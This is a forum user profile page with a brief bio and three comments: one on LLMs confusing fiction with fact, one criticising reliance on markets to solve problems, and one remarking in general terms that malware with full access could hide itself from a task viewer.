Eskating cyclist, gamer and enjoyer of anime. Probably an artist. Also I code sometimes, pretty much just to mod titanfall 2 tho.

Introverted, yet I enjoy discussion to a fault.

  • 0 Posts
  • 102 Comments
Joined 1 year ago
cake
Cake day: June 13th, 2023

help-circle













  • There’s also the fact that they can’t tell reality apart from fiction in general, because they don’t understand anything in the first place.

    LLMs have no way of differentiating fantasy RPG elements from IRL things. So they can lose the plot on what is being discussed suddenly, and for seemingly no reason.

    LLMs don’t just “learn” facts from their training data. They learn how to pretend to be thinking, they can mimic but not really comprehend. If there were facts in the training data, it can regurgitate them, but it doesn’t actually know which facts apply to which subjects, or when to not make some up.





  • That is some serious “capitalism can solve anything and therefore will, if only we let it”-type brain rot.

    This “solution” relies on so many assumptions that don’t even begin to hold water.

    Of course any utopian framework for society could deal with every conceivable problem… But in practice they don’t, and always require intentional regulation to a greater or lesser extent in order to prevent harm, because humans are humans.

    This particular potential problem is almost certainly not the kind that simply “solves itself” if you let it.

    And IMO suggesting otherwise is an irresponsible perpetuation of the kind of thinking that has led human civilization to the current reality of millions starving in the next few decades, due to the predictable environmental destruction of arable land in the near future.


  • Depends on the malware.

    With total access, nothing would prevent the malicious code from modifying the task viewer itself to make it ignore the resources it is using.

    Accounting for every way malware might be discovered is difficult, but with enough system access, it’s all possible.